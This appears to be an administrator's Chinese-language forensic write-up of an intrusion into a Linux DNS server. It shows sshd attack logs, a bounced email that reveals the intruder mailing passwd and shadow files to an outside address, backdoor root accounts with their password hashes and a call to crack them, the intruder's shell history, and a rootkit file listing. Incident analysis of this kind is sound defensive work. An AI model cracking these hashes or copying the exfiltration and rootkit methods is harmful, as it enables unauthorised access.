Feb 2 07:28:34 dnscache sshd[1994]: log: Connection from 24.112.92.
135 port 3857
Feb 2 07:28:39 dnscache sshd[1994]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:28:40 dnscache sshd[1995]: log: Connection from 24.112.92.
135 port 3858
Feb 2 07:28:44 dnscache sshd[1995]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:28:46 dnscache sshd[1996]: log: Connection from 24.112.92.
135 port 3859
Feb 2 07:28:49 dnscache sshd[1996]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:28:49 dnscache sshd[1997]: log: Connection from 24.112.92.
135 port 3860
Feb 2 07:28:54 dnscache sshd[1997]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:28:55 dnscache sshd[1998]: log: Connection from 24.112.92.
135 port 3861
Feb 2 07:28:59 dnscache sshd[1998]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:28:59 dnscache sshd[1999]: log: Connection from 24.112.92.
135 port 3862
Feb 2 07:29:05 dnscache sshd[1999]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:29:06 dnscache sshd[2000]: log: Connection from 24.112.92.
135 port 3863
Feb 2 07:29:09 dnscache sshd[2000]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:29:10 dnscache sshd[2001]: log: Connection from 24.112.92.
135 port 3864
Feb 2 07:29:15 dnscache sshd[2001]: fatal: Local: crc32 compensation
attack: network attack detected
From root Sat Feb 2 08:09:26 2002
Return-Path:
Received: from localhost (localhost)
by dnscache.i-168.com (8.9.3/8.9.3) with internal id IAA02520;
Sat, 2 Feb 2002 08:09:25 +0800
Date: Sat, 2 Feb 2002 08:09:25 +0800
From: Mail Delivery Subsystem
Message-Id: <200202020009.IAA02520@dnscache.i-168.com>
To: root@dnscache.i-168.com
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
boundary="IAA02520.1012608565/dnscache.i-168.com"
Subject: Returned mail: Service unavailable
Auto-Submitted: auto-generated (failure)
This is a MIME-encapsulated message
--IAA02520.1012608565/dnscache.i-168.com
The original message was received at Sat, 2 Feb 2002 08:09:22 +0800
from root@localhost
----- The following addresses had permanent fatal errors -----
ja_ja_j@yahoo.com
----- Transcript of session follows -----
... while talking to mx2.mail.yahoo.com.:
> >> DATA
< 554 delivery error: dd This user doesn't have a yahoo.com account
(ja_ja_j@yahoo.com) - mta619.mail.yahoo.c
om
554 ja_ja_j@yahoo.com... Service unavailable
--IAA02520.1012608565/dnscache.i-168.com
Content-Type: message/delivery-status
Reporting-MTA: dns; dnscache.i-168.com
Arrival-Date: Sat, 2 Feb 2002 08:09:22 +0800
Final-Recipient: RFC822; ja_ja_j@yahoo.com
Action: failed
Status: 5.0.0
Remote-MTA: DNS; mx2.mail.yahoo.com
Diagnostic-Code: SMTP; 554 delivery error: dd This user doesn't have a
yahoo.com account (ja_ja_j@yahoo.com) -
mta619.mail.yahoo.com
Last-Attempt-Date: Sat, 2 Feb 2002 08:09:25 +0800
--IAA02520.1012608565/dnscache.i-168.com
Content-Type: message/rfc822
Return-Path:
Received: (from root@localhost)
by dnscache.i-168.com (8.9.3/8.9.3) id IAA02513
for ja_ja_j@yahoo.com; Sat, 2 Feb 2002 08:09:22 +0800
Date: Sat, 2 Feb 2002 08:09:22 +0800
From: root
Message-Id: <200202020009.IAA02513@dnscache.i-168.com>
To: ja_ja_j@yahoo.com
Subject: Linux dnscache.i-168.com 2.2.18-2 #1 Tue Feb 27 20:54:01 CST
2001 i686 unknown
Linux dnscache.i-168.com 2.2.18-2 #1 Tue Feb 27 20:54:01 CST 2001 i686
unknown
|------
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/binsync
shutdown:x:6:0:shutdown:/sbin:/sbinshutdown
halt:x:7:0:halt:/sbin:/sbinhalt
mail:x:8:12:mail:/var/spoolmail:
news:x:9:13:news:/var/spoolnews:
uucp:x:10:14:uucp:/var/spooluucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usrgames:
gopher:x:13:30:gopher:/usr/libgopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
wnn:x:127:127:Wnn:/usr/local/bin/Wnn6:
哪里来的SHELL?又是后门,FT!
mysql:x:128:128:MySQL server:/var/lib/mysql:/binbash
bind:x:129:129::/etc/named:/dev/null
piranha:x:60:60::/home/httpd/html/piranha:/dev/null
squid:x:23:23::/var/spool/squid:/dev/null
chair:x:500:503::/home/chair:/bin/bash
dnscache:x:501:504::/home/dnscache:/binbash
dnslog:x:502:505::/home/dnslog:/binbash
cgi:x:0:0::/home/cgi:/bin/bash
家伙1
luck:x:503:506::/home/luck:/bin/bash
家伙2
luck1:x:0:507::/home/luck1:/bin/bash
家伙3|------
root:XXXXXXXXX.:11649:0:99999:7::: 保密啦
bin:*:11649:0:99999:7:::
daemon:*:11649:0:99999:7:::
adm:*:11649:0:99999:7:::
lp:*:11649:0:99999:7:::
sync:*:11649:0:99999:7:::
shutdown:*:11649:0:99999:7:::
halt:*:11649:0:99999:7:::
mail:*:11649:0:99999:7:::
news:*:11649:0:99999:7:::
uucp:*:11649:0:99999:7:::
operator:XXXXXXXXXX:11708:0:99999:7:-1:-1:134539376
games:*:11649:0:99999:7:::
games:*:11649:0:99999:7:::
gopher:*:11649:0:99999:7:::
ftp:*:11649:0:99999:7:::
nobody:*:11649:0:99999:7:::
wnn:*:11649:0:99999:7:::
mysql:!!:11649:0:99999:7:::
bind:!!:11649:0:99999:7:::
piranha:!!:11649:0:99999:7:::
squid:!!:11649:0:99999:7:::
chair:XXXXXXXXX:11649:0:99999:7:-1:-1:134539416 保密啦
dnscache:!!:11649:0:99999:7:::
dnslog:!!:11649:0:99999:7:::
cgi:5DnRYHyIa5w0g:11708:0:99999:7:-1:-1:134539416
luck:SqXj0pjOPwcxA:11720:0:99999:7:-1:-1:134538336
luck1:cqrTW5Ortfn7s:11720:0:99999:7:-1:-1:134538336
这几个就是他们的3DES后的东西,哪位朋友有时间和兴趣就CRACK了他吧
PING 216.115.108.245 (216.115.108.245) from 192.168.100.27 : 56(84)
bytes of data.
64 bytes from 216.115.108.245: icmp_seq=0 ttl=233 time=167.9 ms
64 bytes from 216.115.108.245: icmp_seq=1 ttl=233 time=170.7 ms
64 bytes from 216.115.108.245: icmp_seq=2 ttl=233 time=171.2 ms
64 bytes from 216.115.108.245: icmp_seq=3 ttl=233 time=174.6 ms
64 bytes from 216.115.108.245: icmp_seq=4 ttl=233 time=171.0 ms
--- 216.115.108.245 ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 167.9/171.0/174.6 ms
下面的是在/home/luck/目录下的东西,看来也是不细心,又有
线索了,看样子改了内核,这个家伙在这里还考虑周到,怕
我重编内核??
[root@mail luck]# cat .bash_history
cd /usr/src
ls
cd star
ls
cd S*
ls
tar -zxpvf *
ls
cd root
ls
l
ls
cd ls
ls
ls -af
ls
cd ..
ls
cd etc
ls
cd ..
ls
cd boot
ls
cd ..
ls
cd boto
ls -af
cd ..
ls
cd root
ls
ls -af
cd ..
ls
rm * -rf
ls
tar -zxpvf *
ls
cd ske
ls
ls -af
vi .X*
ls
ls -af
ls
ls -af
rm .X*
LS
ls
rm * -rf
ls
ls -af
ls
ls -af
vi .x*
ls
ls -af
rm .x*
ls
ls -af
vi .inputrc
ls
ls -af
vi .bashrc
ls -af
rm .g*
rm .gnome*
rm .gnome* -rf
ls
ls -af
rm .kde*
ls
ls -af
mv
mc
ls
ls -af
rm .net*
rm .net* -rf
ls -af
mc
ls
ls -af
cp -r .* /root
y
cd /
ls
cd usr
ls
cd src
ls
cd ..
ls
cd ..
ls
cd usr
ls
cd src
ls
cd tar
l
s
ls
cd S&*
cd S*
LS
ls
mount /dev/hdd /mnt/cdrom
cd /mnt/cdrom
ls
cd S*
ls
ls f*
rpm -i filesys*
cd ..
ls *ske*
ls
cd S*
ls
ls *ske*
rpm -i *ske*
cd ..
cd /
ls
cd root
ls
ls -af
cd ..
mv root rootstar
mkdir root
cd root
ls -af
cd ..
ls
cd rootstar
ls
ls -af
cd ..
ls
rm root -rf
ls
mkdir root
ls
cd root
ls -af
ls -a
ls .
rm ske -rf
ls
ls -af
rm skel -rf
ls
ls -af
ls
vi
ls
ROOTKIT里的文件,FT,几乎都考虑周全了,可惜啊,这些常用的
东西网管又怎么会相信呢,通常自己都有另一套东西的啦。
[root@mail rk]# ls
Makefile.non-smp cleaner.c hostkey logrc ps
tcpd
Makefile.smp dir ifconfig ls pstree
top
adore.c dummy.c iferc netstat rename.c
twist2open
afbackup exec-test.c install netstatrc seed
ava.c exec.c libinvisible.c network sshd_conf
bnc filerc libinvisible.h parser syslogd
bnc.conf find logcleaner procrc sz
